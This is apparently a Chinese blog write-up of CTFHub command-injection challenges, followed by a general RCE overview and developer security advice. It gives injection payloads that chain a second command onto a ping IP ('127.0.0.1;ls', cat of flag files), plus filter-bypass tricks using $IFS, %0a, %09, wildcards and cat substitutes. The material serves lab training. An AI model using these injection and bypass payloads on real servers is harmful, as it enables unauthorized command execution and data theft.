CTF_WEB学习-------------RCE之命令注入

CTF_WEB学习-------------RCE之命令注入

REC

什么是RCE?

​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。

RCE产生的原因?

​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。

RCE漏洞分类

  • 命令注入
  • 文件包含
  • eval执行

image-20210713153902947

命令注入

什么是命令注入?

​ 命令注入就是通过控制外部的参数达到执行系统命令的效果

RCE命令注入分类
  • 无过滤
  • 过滤cat
  • 过滤空格
  • 过滤目录分隔符
  • 过滤运算符
  • 综合过滤练习
无过滤
题目

image-20210713155423178

解题过程
  1. 首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls。image-20210713155449327
  2. 接着查看里面的文件,构造命令127.0.0.1;cat +文件名image-20210713155518007
  3. 右键查看前端源码,发现存在flagimage-20210713155539956
过滤cat

​ 过滤cat,那么我们应当首先想到什么命令可以和cat 拥有相同的效果。和cat具有相同效果的命令有:

  • more
  • less
  • head
  • tail
题目

​ 题目提示:过滤了cat命令之后,你还有什么方法能读到 Flag?image-20210713165540383

解题过程
  1. 执行命令127.0.0.1;ls,发现几个PHP文件image-20210713165730660
  2. 因为cat会被过滤,使用more命令去代替它,127.0.0.1; more flag_317491770120937.phpimage-20210713170029999
过滤空格

​ 过滤空格,我们首先想到CTF题目中什么可以替代空格,这样的话我们就可以成功的绕过空格被过滤的限制。CTF中常用的绕过过滤空格的方法有:

$IFS
$IFS$1
${IFS}
$IFS$9
<     比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20
%09
题目

​ 题目提示:这次过滤了空格,你能绕过吗,我们就采取措施,想办法去绕过过滤。image-20210713171754496

解题过程
  1. 执行命令 127.0.0.1;ls,查看可以访问的文件,发现一个flag_12954450028809.php文件。image-20210713171955683
  2. 使用cat命令去查看这个文件中有什么,并且此时要绕过对空格的过滤,执行命令:127.0.0.1; cat${IFS}flag_12954450028809.php,拿到flag。image-20210713172515844
过滤目录分隔符

​ 题目提示:这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗

​ 本题的思路不是用什么东西去绕过目录分隔符店的过滤,而是这个题目是对文件夹里的目录里的PHP文件的读取,所以我们不能直接cat文件夹,我们应当使用的系统命令cd去查看文件夹下的文件,然后去cat文件夹下的PHP文件

题目

image-20210714102446572

解题过程
  1. 阅读源码发现过滤**/ \ //**,我们不能利用目录分割符,去访问文件。image-20210714102911995
  2. 我们使用cd 命令查看这个文件夹127.0.0.1;cd flag_is_here;lsimage-20210714103615025
  3. 接着我们去cat flag_18515776511094.php执行命令127.0.0.1;cd flag_is_here;cat flag_18515776511094.php,获取到flagimage-20210714103845351
过滤运算符

​ 这个题目说过滤几个运算符,但是不影响我们做题,和前面的几道题目的思路类似。

题目

​ 题目提示:过滤了几个运算符, 要怎么绕过呢

image-20210714110718220

解题过程
  1. 执行命令127.0.0.1;ls,查看可利用信息,发现一个PHP文件。image-20210714111106676
  2. 执行命令**127.0.0.1;cat flag_6086289321351.php,**拿到flagimage-20210714111402926
综合过滤练习

​ 题目对**|,&,;, ,/,cat,flag,ctfhub**这些进行了过滤,我们的目的就是对这些进行替换

用more替换cat
用%0a去替换;
空格用${IFS}替换
flag可以用正则替换f***
flag可以用TAB加*替换,不过要用url编码TAB,表示为%09加*

注意本题提交的payload都是在浏览器输入框中输入的,不然会被二次转义。

题目

​ 题目提示:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢?

解题过程
  1. 输入命令127.0.0.1%0als,使用%0a代替 ;image-20210714220849200

  2. 使用正则表达式代替flag,使用{IFS}代替空格,此处注意传cd到文件夹下以后,要使用ls将文件加下的文件列出来。最后输入命令127.0.0.1%0acd${IFS}f***_is_here
    ${IFS}%0alsimage-20210714221447353

  3. 输入命令ip=127.0.0.1%0acd${IFS}f***_is_here
    ${IFS}%0amore
    ${IFS}f***_5222980724357.php,获取到flag

image-20210714221719423

  1. 输入命令ip=127.0.0.1%0acd${IFS}f***_is_here
    ${IFS}%0amore{IFS} f***_5222980724357.php,获取到flag

image-20210714221746883

### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值